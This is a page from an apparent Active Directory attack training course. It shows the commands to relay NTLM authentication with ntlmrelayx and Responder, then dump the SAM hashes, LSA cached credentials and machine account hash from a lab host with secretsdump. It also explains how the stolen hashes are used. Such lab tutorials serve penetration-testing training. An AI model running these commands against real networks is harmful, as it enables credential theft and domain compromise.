> For the complete documentation index, see [llms.txt](https://watchdogsacademy.gitbook.io/attacking-active-directory/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://watchdogsacademy.gitbook.io/attacking-active-directory/exploiting-with-poison-and-relay/secretsdump.md).

# Secretsdump

Use secretsdump to get SAM database, LSA cached logon, machine account and some DPAPI informations

### Run ntlmrelayx.py and wait for a connecting for fernando.alonzo

```
sudo ntlmrelayx.py -socks -smb2support -tf unsigned_smb.txt
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fnhw6FVKwGNsOZjy4VPgJ%2Fimage.png?alt=media&amp;token=f4bbb649-4ac8-4b37-b868-b99443086f6d" alt=""><figcaption></figcaption></figure>

### Run Responder

```
sudo responder -I enp0s3
```

### Dump the sam database

```
proxychains secretsdump -no-pass 'NORTH'/'fernando.alonzo'@'192.168.56.22'
```

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2FMdVazwM1qRfLmNvDLVUJ%2Fimage.png?alt=media&amp;token=a55b7e17-3a55-4311-800e-d779aafb631b" alt=""><figcaption></figcaption></figure>

<figure><img src="https://755243087-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FB2Dm6vWGbM7kQRITOyVl%2Fuploads%2Fd6SUT72hCPEJEWjRaMTE%2Fimage.png?alt=media&amp;token=91a35192-1b74-4530-a37a-8bb8363e0c5a" alt=""><figcaption></figcaption></figure>

* The sam database contains the local accounts. We will ignore vagrant as it is the default user to setup the lab.
* The important information here is the NT hash of the local administrator user.
* We also got the LSA cache of the last connected users (by default windows keep the last 10 users), this is useful to connect to the server even if the domain controller is unreachable. But those cached credentials can be cracked offline with hashcat (very slow).
* And to finish we also got the hash of the computer account. (Sometimes you will get no useful domain accounts or no information at all on a domain joined computer but if you get this hash you got an account on the domain!)
